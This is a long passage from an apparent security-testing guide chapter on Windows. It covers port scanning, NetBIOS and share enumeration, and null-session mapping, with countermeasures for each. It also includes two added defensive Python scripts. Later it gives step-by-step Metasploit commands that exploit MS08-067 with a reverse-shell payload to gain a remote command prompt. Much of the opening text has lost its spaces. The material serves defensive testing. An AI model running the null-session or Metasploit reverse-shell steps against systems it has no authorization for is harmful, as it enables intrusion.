Thispartstartsbylookingatthemostwidelyused(andpickedon)operatingsystem—MicrosoftWindows.FromWindowsXP(yep,it’sstilloutthere!)toWindows10andServer2016,Ishowyousomeofthebestwaystoattacktheseoperatingsystemsandsecurethemfromthebadguys.ThispartthenlooksatLinuxanditslesspublicized(yetstillmajor)securityflaws.ManyofthehacksandcountermeasuresIcovercanapplytomanyotherflavorsofUNIXand,yes,evenMacOSXaswell.
WindowsInThisChapter
PortscanningWindowssystems
GleaningWindowsinformationwithoutloggingin
CatchingtheWindowssecurityflawsyoudon’twanttooverlook
ExploitingWindowsvulnerabilities
MinimizingWindowssecurityrisks
MicrosoftWindows(withsuchversionsasWindows7;WindowsServer2012;Windows8.1;andthenewestflavor,Windows10)isthemostwidelyusedoperatingsystem(OS)intheworld.It’salsothemostwidelyabused.IsthisbecauseMicrosoftdoesn’tcareasmuchaboutsecurityasotherOSvendors?Theshortansweris“no.”Sure,numeroussecurityflawswereoverlooked—especiallyintheWindowsNTdays—butMicrosoftproductsaresopervasivethroughouttoday’snetworksthatMicrosoftistheeasiestvendortopickon;therefore,Microsoftproductsoftenendupinthebadguys’crosshairs.Theonepositiveaboutcriminalhackersisthatthey’redrivingtherequirementforbettersecurity!
Manyofthesecurityflawsintheheadlinesaren’tnew.They’revariantsofvulnerabilitiesthathavebeenaroundforalongtime.You’veheardthesaying,“Themorethingschange,themoretheystaythesame.”Thatapplieshere,too.MostWindowsattacksarepreventableifthepatchesareproperlyapplied.Thus,poorsecuritymanagementisoftentherealreasonWindowsattacksaresuccessful,yetMicrosofttakestheblameandmustcarrytheburden.
InadditiontothepasswordattacksIcoverinChapter8,manyotherattacksarepossibleagainstaWindows-basedsystem.TonsofinformationcanbeextractedfromWindowsbysimplyconnectingtothesystemacrossanetworkandusingtoolstoextracttheinformation.Manyofthesetestsdon’tevenrequireyoutobeauthenticatedtotheremotesystem.AllsomeonewithmaliciousintentneedstofindonyournetworkisavulnerableWindowscomputerwithadefaultconfigurationthat’snotprotectedbysuchmeasuresasapersonalfirewallandthelatestsecuritypatches.
Whenyoustartpokingaroundonyournetwork,youmightbesurprisedathowmanyofyourWindows-basedcomputershavesecurityvulnerabilities.Furthermore,you’llbeevenmoresurprisedatjusthoweasyitistoexploitvulnerabilitiestogaincompleteremotecontrolofWindowsbyusingatoolsuchasMetasploit.AfteryouconnecttoaWindowssystemandhaveavalidusernameandpassword(byknowingitorderivingitbyusingthepassword-crackingtechniquesdiscussedinChapter8orothertechniquesoutlinedinthischapter),youcandigdeeperandexploitotheraspectsofWindows.
Thischaptershowsyouhowtotestforsomeofthelow-hangingfruitinWindows(the
flawsthatgetpeopleintotroublethemost)andoutlinescountermeasurestomakesureyourWindowssystemsaresecure.
IntroducingWindowsVulnerabilitiesGivenWindows’easeofuse,itsenterprise-readyActiveDirectoryservice,andthefeature-rich.NETdevelopmentplatform,mostorganizationsusetheMicrosoftplatformformuchoftheirnetworkingandcomputingneeds.Manybusinesses—especiallythesmall-tomedium-sizedones—dependsolelyontheWindowsOSfornetworkusage.Manylargeorganizationsruncriticalservers,suchaswebserversanddatabaseservers,ontheWindowsplatformaswell.Ifsecurityvulnerabilitiesaren’taddressedandmanagedproperly,theycanbringanetworkoranentireorganization(largeorsmall)toitsknees.
WhenWindowsandotherMicrosoftsoftwareareattacked—especiallybyawidespreadInternet-basedwormorvirus—hundredsofthousandsoforganizationsandmillionsofcomputersareaffected.Manywell-knownattacksagainstWindowscanleadtothefollowingproblems:
Leakageofsensitiveinformation,includingfilescontaininghealthcareinformationandcreditcardnumbersPasswordsbeingcrackedandusedtocarryoutotherattacksSystemstakencompletelyofflinebydenialofservice(DoS)attacksFullremotecontrolbeingobtainedEntiredatabasesbeingcopiedordeleted
WhenunsecuredWindows-basedsystemsareattacked,seriousthingscanhappentoatremendousnumberofcomputersaroundtheworld.
ChoosingToolsLiterallyhundredsofWindowshackingandtestingtoolsareavailable.Thekeyistofindasetoftoolsthatcandowhatyouneedandthatyou’recomfortableusing.
Manysecuritytools—includingsomeofthetoolsinthischapter—workwithonlycertainversionsofWindows.Themostrecentversionofeachtoolinthischaptershouldbecompatiblewithcurrently-supportedversionsofWindows(Windows7andWindowsServer2008R2andnewer),butyourmileagemayvary.
Ihavefoundthatthemoresecuritytoolsandother“poweruser”applicationsyouinstallinWindows—especiallyprogramsthattieintothenetworkdriversandTCP/IPstack—themoreunstableWindowsbecomes.I’mtalkingaboutslowperformance,generalinstabilityissues,andeventheoccasionalbluescreensofdeath.Unfortunately,oftentheonlyfixistoreinstallWindowsandallyourapplications.Afteryearsofrebuildingmytestingsystemseveryfewmonths,IfinallywisedupandboughtacopyofVMwareWorkstationandadedicatedcomputerthatIcanjunkupwithtestingtoolswithoutworryingaboutitaffectingmyabilitytogetmyotherworkdone.(Ah,thememoriesofthoseDOSandWindows3.xdayswhenthingsweremuchsimpler!)
FreeMicrosofttoolsYoucanusethefollowingfreeMicrosofttoolstotestyoursystemsforvariousweaknesses:
Built-inWindowsprogramsforNetBIOSandTCP/UDPserviceenumeration,suchasthesethree:
nbtstatforgatheringNetBIOSnametableinformationnetstatfordisplayingopenportsonthelocalWindowssystemnetforrunningvariousnetwork-basedcommands,includingviewingsharesonremoteWindowssystemsandaddinguseraccountsafteryougainaremotecommandpromptviaMetasploit
MicrosoftBaselineSecurityAnalyzer(MBSA)(https://technet.microsoft.com/en-us/security/cc184924.aspx)totestformissingpatchesandbasicWindowssecuritysettingsSysinternals(http://technet.microsoft.com/en-us/sysinternals/default.aspx)topoke,prod,andmonitorWindowsservices,processes,andresourcesbothlocallyandoverthenetwork
All-in-oneassessmenttoolsAll-in-onetoolsperformawidevarietyofsecuritytests,includingthefollowing:
PortscanningOSfingerprintingBasicpasswordcrackingDetailedvulnerabilitymappingsofthevarioussecurityweaknessesthatthetoolsfindonyourWindowssystems
Itypicallyusethesetoolsinmyworkwithverygoodresults:
GFILanGuard(www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard)Nexpose(www.rapid7.com/products/nexpose)
Task-specifictoolsThefollowingtoolsperformmorespecifictasksforuncoveringWindows-relatedsecurityflaws.ThesetoolsprovidedetailedinsightintoyourWindowssystemsandprovideinformationthatyoumightnototherwisegetfromall-in-oneassessmenttools:
Metasploit(www.metasploit.com)forexploitingvulnerabilitiesthatsuchtoolsasNexposeandQualysdiscovertoobtainremotecommandprompts,addusers,setupremotebackdoors,andmuchmoreNetScanToolsPro(www.netscantools.com)forportscanning,pingsweeps,andshareenumerationSoftPerfectNetworkSecurityScanner(www.softperfect.com/products/networkscanner)forportscanningandshareenumerationTCPView(http://technet.microsoft.com/en-us/sysinternals/bb897437.aspx)toviewTCPandUDPsessioninformationWinfo(www.ntsecurity.nu/toolbox/winfo)fornullsessionenumerationtogathersuchconfigurationinformationassecuritypolicies,localuseraccounts,andshares
KeepinmindthatdisablingtheWindowsFirewall(orotherthird-partyfirewallthat’srunningonyourtestsystem)canhelpspeedthingsup.Dittoforanti-virussoftware—justbecareful.Ifpossible,runyoursecuritytestsusingadedicatedsystemorvirtualmachine,becausedoingsominimizesanyimpactyourtestresultsmayhaveontheotherworkyoudoonyourcomputer.
GatheringInformationAboutYourWindowsVulnerabilities
WhenyouassessWindowsvulnerabilities,startbyscanningyourcomputerstoseewhatthebadguyscansee.
TheexploitsinthischapterwererunagainstWindowsfrominsideafirewall,ontheinternalnetwork.UnlessIpointoutotherwise,allthetestsinthischaptercanberunagainstallversionsoftheWindowsOS.Theattacksinthischapteraresignificantenoughtowarranttestingfor,regardlessofyourcurrentsetup.YourresultswillvaryfromminedependingonthespecificversionofWindows,patchlevels,andothersystemhardeningyou’vedone.
System scanning
A few straightforward processes can identify weaknesses in Windows systems.
Testing
Start gathering information about your Windows systems by running an initial port scan:
1. Run basic scans to find which ports are open on each Windows system:
Scan for TCP ports with a port scanning tool, such as NetScanTools Pro. The NetScanTools Pro results shown in Figure 12-1 reveal several potentially vulnerable ports open on a Windows 7 system, including those for DNS (UDP port 53); the ever-popular — and easily hacked — NetBIOS (port 139); and SQL Server (UDP 1434).
2. Perform OS enumeration (such as scanning for shares and specific OS versions) by using an all-in-one assessment tool, such as LanGuard.
Figure 12-2 shows a LanGuard scan that reveals the server version, vulnerabilities, open ports, and more.
As you can see, GFI ranks AutoRun-enabled and source-routed packets from arbitrary hosts as "High" Security Vulnerabilities. I discuss the subject of vulnerability prioritization in Chapter 17.
If you need to quickly identify the specific version of Windows that's running, you can use Nmap (http://nmap.org/download.html) with the -O option, as shown in Figure 12-3.
Other OS fingerprinting tools are available, but I've found Nmap to be one of the most accurate.
3. Determine potential security vulnerabilities.
This is subjective and might vary from system to system, but what you want to look for are interesting services and applications; proceed from there.
Figure 12-1: Port scanning a Windows 7 system with NetScanTools Pro.
Figure 12-2: Gathering port and vulnerability details from a Windows-based web server with LanGuard.
Figure 12-3: Using Nmap to determine the Windows version.
Countermeasures against system scanning
You can prevent an external attacker or malicious internal user from gathering certain information about your Windows systems by implementing the proper security settings on your network and on the Windows hosts. You have the following options:
Use a network firewall or web application firewall (WAF) for systems running Internet Information Services (IIS).
Use the Windows Firewall or other personal firewall software on each system. You want to block the Windows networking ports for RPC (port 135) and NetBIOS (ports 137–139 and 445).
Disable unnecessary services so that they don't appear when a connection is made.
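Blocking those ports is only half the job; you also have to confirm the rule actually holds from the network side. The following Python script is an added example (it is not from the book or from any of the tools it names): it attempts a plain TCP connect() to the ports listed above from a host on the far side of the firewall and reports which ones still answer. The host name, port list and timeout are assumptions you supply; the stand-alone demo opens a listener on 127.0.0.1 so the script can be tried offline. UDP 137 and 138 cannot be verified this way, because a dropped UDP datagram and a silent listener look the same.

```python
"""Check whether the Windows networking ports the chapter says to block
(RPC 135, NetBIOS session 139, SMB 445) are reachable from another host.

Added example, not from the book. Run it from a machine on the far side of
the firewall from the Windows host you are checking; the hostname, port
list and timeout are assumptions you supply."""
import socket
from typing import Dict, Iterable, List, Tuple

# TCP ports named in the countermeasures above (137/138 are UDP name and
# datagram services and cannot be verified with a plain connect()).
WINDOWS_NETWORKING_TCP_PORTS: Tuple[int, ...] = (135, 139, 445)


def tcp_port_reachable(host: str, port: int, timeout: float = 1.0) -> bool:
    """Return True if a TCP three-way handshake to host:port completes.

    A refused connection (nothing listening) and a timeout (packet dropped
    by a firewall) both count as not reachable, which is the result we want."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        try:
            sock.connect((host, port))
        except OSError:  # ConnectionRefusedError and socket.timeout are OSErrors
            return False
        return True


def check_blocked_ports(host: str,
                        ports: Iterable[int] = WINDOWS_NETWORKING_TCP_PORTS,
                        timeout: float = 1.0) -> Dict[int, str]:
    """Map each port to 'OPEN' (firewall is not blocking it) or 'blocked/closed'."""
    return {port: ("OPEN" if tcp_port_reachable(host, port, timeout) else "blocked/closed")
            for port in ports}


def exposed_ports(results: Dict[int, str]) -> List[int]:
    """Ports that still answer and therefore still need a firewall rule."""
    return sorted(port for port, state in results.items() if state == "OPEN")


def demo_with_local_listener() -> Tuple[int, int, Dict[int, str]]:
    """Stand-alone demonstration needing no remote host: open one listener on
    127.0.0.1, pick a second port nobody listens on, and check both."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    open_port = listener.getsockname()[1]

    # Bind-and-release to find a port that is currently free, so connect() is refused.
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]
    probe.close()

    try:
        results = check_blocked_ports("127.0.0.1", [open_port, closed_port])
    finally:
        listener.close()
    return open_port, closed_port, results


if __name__ == "__main__":
    # Real use against a host you are responsible for:
    #   check_blocked_ports("windows-host.example", timeout=2.0)   # hostname is a placeholder
    opened, closed, outcome = demo_with_local_listener()
    for p, state in outcome.items():
        print(f"127.0.0.1:{p} {state}")
    print("exposed:", exposed_ports(outcome))
```

A port reported as OPEN from outside the firewall means the rule is missing or the traffic is being allowed by a more specific rule; a result of blocked/closed does not distinguish a firewall drop from a service that is simply not running, so pair this check with a local service inventory on the host itself.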
NetBIOS
You can gather Windows information by poking around with NetBIOS (Network Basic Input/Output System) functions and programs. NetBIOS allows applications to make networking calls and communicate with other hosts within a LAN.
These Windows NetBIOS ports can be compromised if they aren't properly secured:
UDP ports for network browsing:
Port 137 (NetBIOS name services, also known as WINS)
Port 138 (NetBIOS datagram services)
TCP ports for Server Message Block (SMB):
Port 139 (NetBIOS session services, also known as CIFS)
Port 445 (runs SMB over TCP/IP without NetBIOS)
Hacks
The hacks described in the following two sections can be carried out on unprotected systems running NetBIOS.
Unauthenticated enumeration
When you're performing your unauthenticated enumeration tests, you can gather configuration information about the local or remote systems two ways:
Using all-in-one scanners, such as LanGuard or Nexpose
Using the nbtstat program that's built into Windows (nbtstat stands for NetBIOS over TCP/IP Statistics)
Figure 12-4 shows information that you can gather from a Windows 7 system with a simple nbtstat query.
Figure 12-4: Using nbtstat to gather information on a Windows 7 system.
nbtstat shows the remote computer's NetBIOS name table, which you gather by using the nbtstat -A command. This displays the following information:
Computer name
Domain name
Computer's MAC address
An advanced program such as Nexpose isn't necessary to gather this basic information from a Windows system. However, the graphical interface offered by commercial software such as this presents its findings in a prettier fashion and is often much easier to use. Additionally, you have the benefit of gathering the information you need with one tool.
Shares
Windows uses network shares to share certain folders or drives on the system so other users can access them across the network. Shares are easy to set up and provide a great way to share files with other users on the network without having to involve a server. However, they're often misconfigured, allowing users, malware, and external attackers that have made their way inside the network to access information they shouldn't be able to get to otherwise. You can search for Windows network shares by using the Share Finder tool built into LanGuard. This tool scans an entire range of IP addresses, looking for Windows shares, as shown in Figure 12-5.
Figure 12-5: Using LanGuard to scan your network for Windows shares.
The Everyone group has full share and file access to the LifeandHealth share on the THINKPAD host. I see situations like this all the time where someone shares their local drive so others can access it. The problem is they often forget to remove the permissions and leave a gaping hole for a security breach.
The shares displayed in Figure 12-5 are just what malicious insiders are looking for because the share names give a hint of what type of files might be accessible if they connect to the shares. After those with ill intent discover such shares, they're likely to dig a little further to see whether they can browse and access the files within the shares. I cover shares and rooting out sensitive information on network shares later in this chapter and in Chapter 16.
Countermeasures against NetBIOS attacks
You can implement the following security countermeasures to minimize NetBIOS and NetBIOS over TCP/IP attacks on your Windows systems:
Use a network firewall.
Use Windows Firewall or some other personal firewall software on each system.
Disable Windows File and Printer Sharing, which can be found in the Windows Control Panel. For example, in Windows 8.1 it's located under Control Panel, Network and Internet, Network and Sharing Center, Change advanced sharing settings.
Educate your users on the dangers of enabling file shares with improper security access controls for everyone to access. I cover these risks further in this chapter below as well as in Chapter 16. They're no doubt one of the greatest risks on most networks today.
Hidden shares — those with a dollar sign ($) appended to the end of the share name — don't really help hide the share name. Any of the tools I've mentioned can see right through this form of security by obscurity. In fact, if you come across such shares, you'll want to look at them more closely, as a user may be trying to hide something or otherwise knows that the information on the share is sensitive and doesn't want to draw attention to it.
Detecting Null Sessions
A well-known vulnerability within Windows can map an anonymous connection (or null session) to a hidden share called IPC$ (which stands for interprocess communication). This attack method can be used to
Gather Windows host configuration information, such as user IDs and share names.
Edit parts of the remote computer's registry.
Although Windows Server 2008 and up as well as Windows 7, Windows 8, and Windows 10 don't allow null session connections by default, I often come across systems that have been configured in such a way (often by disabling Windows Firewall) that this vulnerability can still cause problems on your network.
Although later versions of Windows are much more secure than their predecessors, don't assume that all's well in Windows-land. I can't tell you how many times I see supposedly secure Windows installations "tweaked" to accommodate an application or other business need that happens to facilitate exploitation.
Mapping
Follow these steps for each Windows computer to which you want to map a null session:
1. Format the basic net command, like this:
net use \\host_name_or_IP_address\ipc$ "" "/user:"
The net command to map null sessions requires these parameters:
net (the built-in Windows network command) followed by the use command
The IP address or hostname of the system to which you want to map a null connection
A blank password and username
The blanks are why it's called a null connection.
2. Press Enter to make the connection.
Figure 12-6 shows an example of the complete command when mapping a null session. After you map the null session, you should see the message The command completed successfully.
Figure 12-6: Mapping a null session to a vulnerable Windows system.
To confirm that the sessions are mapped, enter this command at the command prompt:
net use
As shown in Figure 12-6, you should see the mappings to the IPC$ share on each computer to which you're connected.
GleaninginformationWithanullsessionconnection,youcanuseotherutilitiestogathercriticalWindowsinformationremotely.Dozensoftoolscangatherthistypeofinformation.
You—likeahacker—cantaketheoutputoftheseenumerationprogramsandattempt(asanunauthorizeduser)to
Crackthepasswordsoftheusersfound.(SeeChapter8formoreonpasswordcracking.)Mapdrivestoeachcomputer’snetworkshares.
YoucanusethefollowingapplicationsforsystemenumerationagainstserverversionsofWindowspriortoServer2003aswellasWindowsXP.Don’tlaugh,IstillseethesearchaicversionsofWindowsrunning.
netviewThenetviewcommand(seeFigure12-7)showssharesthattheWindowshosthasavailable.Youcanusetheoutputofthisprogramtoseeinformationthattheserverisadvertisingtotheworldandwhatcanbedonewithit,includingthefollowing:
Shareinformationthatanattackercanusetoexploityoursystems,suchasmappingdrivesandcrackingsharepasswords.Sharepermissionsthatmightneedtoberemoved,suchasthepermissionfortheEveryonegroup,toatleastseetheshareonolderWindows2000–basedsystemsifyouhavethoseonyournetwork.
Figure12-7:netviewdisplaysdrivesharesonaremoteWindowshost.
ConfigurationanduserinformationWinfo(www.ntsecurity.nu/toolbox/winfo)andDumpSec(www.systemtools.com/somarsoft/index.html)cangatherusefulinformationaboutusersandconfigurations,suchas
WindowsdomaintowhichthesystembelongsSecuritypolicysettingsLocalusernamesDriveshares
Yourpreferencemightdependonwhetheryoulikegraphicalinterfacesoracommandline:
Winfoisacommand-linetool.
BecauseWinfoisacommand-linetool,youcancreatebatch(script)filesthatautomatetheenumerationprocess.ThefollowingisanabbreviatedversionofWinfo’soutputofaWindowsNTserver,butyoucancollectthesameinformationfromotherWindowssystems:
Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom
  - http://www.ntsecurity.nu/toolbox/winfo/
SYSTEM INFORMATION:
  - OS version: 4.0
PASSWORD POLICY:
  - Time between end of logon time and forced logoff: No forced logoff
  - Maximum password age: 42 days
  - Minimum password age: 0 days
  - Password history length: 0 passwords
  - Minimum password length: 0 characters
USER ACCOUNTS:
  * Administrator
    (This account is the built-in administrator account)
  * doctorx
  * Guest
    (This account is the built-in guest account)
  * IUSR_WINNT
  * kbeaver
  * nikki
SHARES:
  * ADMIN$
    - Type: Special share reserved for IPC or administrative share
  * IPC$
    - Type: Unknown
  * Here2Bhacked
    - Type: Disk drive
  * C$
    - Type: Special share reserved for IPC or administrative share
  * Finance
    - Type: Disk drive
  * HR
    - Type: Disk drive
This information cannot be gleaned from a default installation of Windows Server 2003 or Windows XP and later versions of Windows — only from supported systems.
You can peruse the output of such tools for user IDs that don't belong on your system, such as
Ex-employee accounts that haven't been disabled
Potential backdoor accounts that a hacker might have created
If attackers get this information, they can attempt to exploit potentially weak passwords and log in as those users.
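Reading output like the Winfo listing above by eye does not scale past a handful of hosts, and the things worth acting on (a password policy with no minimum length or history, account names that nobody recognizes, disk shares and user-created hidden shares that a null session can see) are easy to miss in a long dump. The following Python script is an added example, not from the book and not part of Winfo: it parses that output format into a report and produces one finding per item a reviewer should follow up on. The embedded sample is a constructed copy of the listing shown above, the set of "expected" account names is an assumption you supply from your own records, and the rule that any share name ending in $ other than ADMIN$, IPC$ and the drive-letter shares is user-created is a simplification.

```python
"""Parse Winfo-style null session output and flag what the chapter says to
look for: a weak password policy, user IDs that don't belong, and shares
(including hidden '$' shares) that a null session can see.

Added example, not from the book or from Winfo itself. SAMPLE_OUTPUT is a
constructed copy of the output format shown in the chapter."""
import re
from dataclasses import dataclass, field
from typing import Dict, FrozenSet, List

SAMPLE_OUTPUT = """\
SYSTEM INFORMATION:
  - OS version: 4.0
PASSWORD POLICY:
  - Time between end of logon time and forced logoff: No forced logoff
  - Maximum password age: 42 days
  - Minimum password age: 0 days
  - Password history length: 0 passwords
  - Minimum password length: 0 characters
USER ACCOUNTS:
  * Administrator
    (This account is the built-in administrator account)
  * doctorx
  * Guest
    (This account is the built-in guest account)
  * IUSR_WINNT
  * kbeaver
  * nikki
SHARES:
  * ADMIN$
    - Type: Special share reserved for IPC or administrative share
  * IPC$
    - Type: Unknown
  * Here2Bhacked
    - Type: Disk drive
  * C$
    - Type: Special share reserved for IPC or administrative share
  * Finance
    - Type: Disk drive
  * HR
    - Type: Disk drive
"""

# Built-in administrative shares (assumption: anything else ending in '$' is user-created).
DEFAULT_ADMIN_SHARE = re.compile(r"^(ADMIN\$|IPC\$|[A-Z]\$)$")


@dataclass
class WinfoReport:
    os_version: str = ""
    password_policy: Dict[str, str] = field(default_factory=dict)
    users: List[str] = field(default_factory=list)
    shares: Dict[str, str] = field(default_factory=dict)  # share name -> type


def parse_winfo(text: str) -> WinfoReport:
    """Walk the output section by section (SYSTEM INFORMATION, SHARES, ...)."""
    report, section, current_share = WinfoReport(), None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith(":") and line.isupper():      # section header
            section = line[:-1]
        elif line.startswith("* "):                     # user or share name
            name = line[2:].strip()
            if section == "USER ACCOUNTS":
                report.users.append(name)
            elif section == "SHARES":
                current_share = name
                report.shares[name] = ""
        elif line.startswith("- "):                     # "key: value" detail line
            key, _, value = line[2:].partition(":")
            key, value = key.strip(), value.strip()
            if section == "SYSTEM INFORMATION" and key == "OS version":
                report.os_version = value
            elif section == "PASSWORD POLICY":
                report.password_policy[key] = value
            elif section == "SHARES" and key == "Type" and current_share:
                report.shares[current_share] = value
    return report


def _leading_int(value: str) -> int:
    match = re.match(r"\d+", value)         # "0 characters" -> 0, "No forced logoff" -> -1
    return int(match.group()) if match else -1


def findings(report: WinfoReport, expected_users: FrozenSet[str] = frozenset()) -> List[str]:
    """One line per item to act on. expected_users (your own list of accounts that
    belong on the host) is an assumption the caller supplies; empty skips that check."""
    out: List[str] = []
    policy = report.password_policy
    if _leading_int(policy.get("Minimum password length", "")) == 0:
        out.append("Password policy: no minimum password length")
    if _leading_int(policy.get("Password history length", "")) == 0:
        out.append("Password policy: no password history enforced")
    for user in report.users:
        if expected_users and user not in expected_users:
            out.append(f"Account to review: '{user}' is not an expected account")
    for name, share_type in report.shares.items():
        if name.endswith("$") and not DEFAULT_ADMIN_SHARE.match(name):
            out.append(f"Hidden share to review: '{name}' ({share_type})")
        elif share_type == "Disk drive":
            out.append(f"Disk share visible to a null session: '{name}'")
    return out


if __name__ == "__main__":
    known = frozenset({"Administrator", "Guest", "IUSR_WINNT", "kbeaver"})   # assumption
    for item in findings(parse_winfo(SAMPLE_OUTPUT), known):
        print(item)
```

Run against the sample with that assumed account list, the script reports the two password-policy gaps, the two accounts (doctorx, nikki) not on the list, and the three disk shares; feed it the real output of a batch run across many hosts and diff the findings between runs to catch new accounts and shares as they appear.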
Countermeasures against null session hacks
If it makes good business sense and the timing is right, upgrade to the more secure Windows Server 2012 or Windows Server 2016 as well as Windows 7 or Windows 10. They don't have the vulnerabilities described in the following list.
You can easily prevent null session connection hacks by implementing one or more of the following security measures:
Block NetBIOS on your Windows server by preventing these TCP ports from passing through your network firewall or personal firewall:
139 (NetBIOS sessions services)
445 (runs SMB over TCP/IP without NetBIOS)
Disable File and Printer Sharing for Microsoft Networks in the Properties tab of the machine's network connection for those systems that don't need it.
Restrict anonymous connections to the system. If you happen to have any Windows NT and Windows 2000 systems left in your environment (hopefully not!), you can set HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous to a DWORD value as follows:
None: This is the default setting.
Rely on Default Permissions (Setting 0): This setting allows the default null session connections.
Do Not Allow Enumeration of SAM Accounts and Shares (Setting 1): This is the medium security level setting. This setting still allows null sessions to be mapped to IPC$, enabling such tools as Walksam to garner information from the system.
No Access without Explicit Anonymous Permissions (Setting 2): This high security setting prevents null session connections and system enumeration.
High security creates problems for domain controller communication and network browsing, so be careful! You can end up crippling the network.
Microsoft Knowledge Base Article 246261 covers the caveats of using the high security setting for RestrictAnonymous. It's available on the web at http://support.microsoft.com/default.aspx?scid=KB;en-us;246261.
For later versions of Windows, such as Windows Server 2008 R2 and Windows 7, ensure that the Network Access anonymous components of the local or group security policy are set as shown in Figure 12-8.
Figure 12-8: Default local security policy settings in Windows 7 that restrict null session connections.
Checking Share Permissions
Windows shares are the available network drives that show up when users browse the network in My Network Places. Windows shares are often misconfigured, allowing more people to have access to them than they should. The casual browser can exploit this security vulnerability, but a malicious insider gaining unauthorized access to a Windows system can result in serious security and compliance consequences, including the leakage of sensitive information and even the corruption or deletion of critical files.
Windows defaults
The default share permission depends on the Windows system version.
Windows 2000/NT
When creating shares in Windows NT and Windows 2000, the group Everyone is given Full Control access in the share by default for all files to:
Browse files
Read files
Write files
You should no longer have these versions of Windows running on your network, but I do still see these versions out there.
Anyone who maps to the IPC$ connection with a null session (as described in the previous section, "Null Sessions") is automatically made part of the Everyone group. This means that remote hackers can automatically gain Browse, Read, and Write access to a Windows NT or Windows 2000 server after establishing a null session.
Windows XP and newer
In Windows XP and newer (Windows Server 2008 R2, Windows 7, and so on), the Everyone group is given only Read access to shares. This is definitely an improvement over the defaults in Windows 2000 and Windows NT. However, you still might have situations in which you don't want the Everyone group to even have Read access to a share.
Share permissions are different from file permissions. When creating shares, you have to set both. In current versions of Windows, this helps create hoops for casual users to jump through and discourages share creation, but it's not foolproof. Unless you have your Windows desktops completely locked down, users can still share out their files at will.
Testing
Assessing your share permissions is a good way to get an overall view of who can access what. This testing shows how vulnerable your network shares — and sensitive information — can be. You can find shares with default permissions and unnecessary access rights enabled. Trust me; they're everywhere!
The best way to test for share weaknesses is to log in to the Windows system via a standard local or domain user with no special privileges and run an enumeration program so you can see who has access to what.
As I outlined earlier, LanGuard has built-in share finder capabilities for uncovering unprotected shares, the options for which are shown in Figure 12-9.
Figure 12-9: LanGuard's Share Finder profile seeks out Windows shares.
I outline more details on uncovering sensitive information in unstructured files on network shares and other storage systems in Chapter 16.
Exploiting Missing Patches
It's one thing to poke and prod Windows to find vulnerabilities that might eventually lead to some good information — maybe system access. However, it's quite another to stumble across a vulnerability that will provide you with full and complete system access — all within 10 minutes. Well, it's not an empty threat for someone to run "arbitrary code" on a system that may lead to a vulnerability exploitation. With such tools as Metasploit, all it takes is one missing patch on one system to gain access and demonstrate how the entire network can be compromised. A missing patch like this is the criminal hacker's pot of gold.
Even with all the written security policies and fancy patch management tools, on every network I come across, numerous Windows systems don't have all the patches applied. There may be a reason for it, such as false positives from vulnerability scanners, or the missing patches have been deemed to be acceptable risks. Even if you think all your systems have the latest patches installed, you have to be sure. It's what security assessments are all about: Trust but verify.
Before you go 'sploitin' vulnerabilities with Metasploit, it's very important to know that you're venturing into sensitive territory. Not only can you gain full, unauthorized access to sensitive systems, but you can also put the systems being tested into a state where they can hang or reboot. So, read each exploit's documentation and proceed with caution.
Before you can exploit a missing patch or related vulnerability, you have to first find out what's available for exploitation. The best way to go about doing this is to use a tool such as Nexpose or LanGuard to find them. I've found Nexpose to be very good at rooting out such vulnerabilities even as an unauthenticated user on the network. Figure 12-10 shows Nexpose scan results of a Windows server system that has the nasty Windows Plug and Play Remote Code Execution vulnerability (MS08-067) from 2008 that I still see quite often.
Windows 10 security
With all the vulnerabilities in Windows, it's sometimes tempting to jump ship and move to Linux or Mac OS X. But not so fast. Microsoft made great strides with security in Windows 7 and Windows 8.x — both of which have laid the groundwork for what's now the much more secure Windows 10.
Building on Windows 8.x, Microsoft has made even more improvements in Windows 10 beyond the restored start button and start menu, including the following:
Windows Update for Business that provides greater control over enterprise Windows patch management.
Scheduled restarts for Windows patches to perhaps nudge users along.
Windows Hello for user authentication supporting existing fingerprint scanners and other biometric devices such as face and iris scanners.
Finally, Windows 10 is even faster than Windows 8 — which is really nice, especially if you use the OS for security testing. Its speed might also be just what you need to put an end to users disabling their antivirus software to speed their computers up — which happens quite often.
Having run various scans and attacks against Windows 10 systems, I've found that it's a darn secure default installation. But, that doesn't mean Windows 10 is immune to attack and abuse. As long as the human element is involved in software development, network administration, and end-user functions, people will continue to make mistakes that leave windows open (pun intended) for the bad guys to sneak through and carry out their attacks. The key is to make sure you never let your guard down!
Using Metasploit
After you find a vulnerability, the next step is to exploit it. In this example, I use Metasploit Framework (an open source tool owned and maintained by Rapid7) and obtain a remote command prompt on the vulnerable server. Here's how:
1. Download and install Metasploit (currently at version 4.11) from www.rapid7.com/products/metasploit/download.jsp.
I use the Windows version; all you have to do is download and run the executable.
2. After the installation is complete, run the Metasploit Console, which is Metasploit's main console.
There's also a web-based version of Metasploit that you can access through your browser (Metasploit Web UI), but I prefer the console interface.
You see a screen similar to the one shown in Figure 12-11.
3. Enter the exploit you wish to run. For example, if you want to run the Microsoft MS08-067 Plug and Play exploit, enter the following:
use exploit/windows/smb/ms08_067_netapi
4. Enter the remote host (RHOST) you wish to target and the IP address of the local host (LHOST) you're on with the following commands:
set RHOST ip_address
set LHOST ip_address
5. Set the target operating system (usually 0 for automatic targeting) with the following command:
set TARGET 0
6. Set the payload (exploit data) that you want to execute. I typically choose windows/shell_reverse_tcp as it provides a remote command prompt on the system being exploited.
Figure 12-12 shows what you should have displayed in the Metasploit console screen.
7. The final step is to simply enter exploit in the Metasploit console. This command invokes the final step where Metasploit delivers the payload to the target system. Assuming the exploit is successful, you should be presented a command prompt where you can enter typical DOS commands such as 'dir' as shown in Figure 12-13.
Figure 12-11: The main Metasploit console.
Figure 12-12: Metasploit options to obtain a remote command prompt on the target system.
Figure 12-13: Remote command prompt on target system obtained by exploiting a missing Windows patch.
